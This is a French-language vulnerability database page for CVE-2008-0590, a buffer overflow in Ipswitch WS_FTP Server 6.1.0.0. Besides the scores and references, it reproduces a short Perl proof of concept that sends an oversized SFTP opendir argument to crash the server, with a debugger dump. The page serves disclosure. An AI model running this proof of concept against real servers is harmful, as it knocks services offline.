CVE-2008-0590 : Détail

CVE-2008-0590

Overflow
2.3%V4
Network
2008-02-05
10h00 +00:00
2018-10-15
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in Ipswitch WS_FTP Server with SSH 6.1.0.0 allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long opendir command.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9 AV:N/AC:L/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 5044

Date de publication : 2008-02-02 23h00 +00:00
Auteur : securfrog
EDB Vérifié : Yes

# IpSwitch WS_FTPSERVER with SSH remote Buffer Overflow # # Website:http://www.wsftp.com/products/ws_ftp_server/ # # Version:6.1.0.0 ( last one,others might be vuln too ) # # Bug: Remote Buffer Overflow ( CD) # # (8e8.a78): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=00410041 edx=7c9137d8 esi=00000000 edi=00000000 # eip=00410041 esp=04b8c830 ebp=04b8c850 iopl=0 nv up ei pl zr na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # 00410041 ?? ??? # # #Here's the PoC : use strict; use Net::SSH2; my $ip="127.0.0.1"; my $port=22; my $user="USERNAME"; my $pass="PASSWORD"; my $ssh2 = Net::SSH2->new(); my $payload ="A" x 5131; $ssh2->connect($ip, $port) || die "could not connect"; $ssh2->auth_password($user,$pass)|| die "wrong passwd/login"; print "Poc running ...\n"; my $sftp = $ssh2->sftp my $dir = $sftp->opendir($payload); print "Buffer Overflow Successfull\n"; $ssh2->disconnect(); exit; # milw0rm.com [2008-02-03]

Products Mentioned

Configuraton 0

Progress>>Ws_ftp_server >> Version 6.1.0.0

Références

http://www.securityfocus.com/bid/27573
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/5044
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/28753
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/3609
Tags : third-party-advisory, x_refsource_SREASON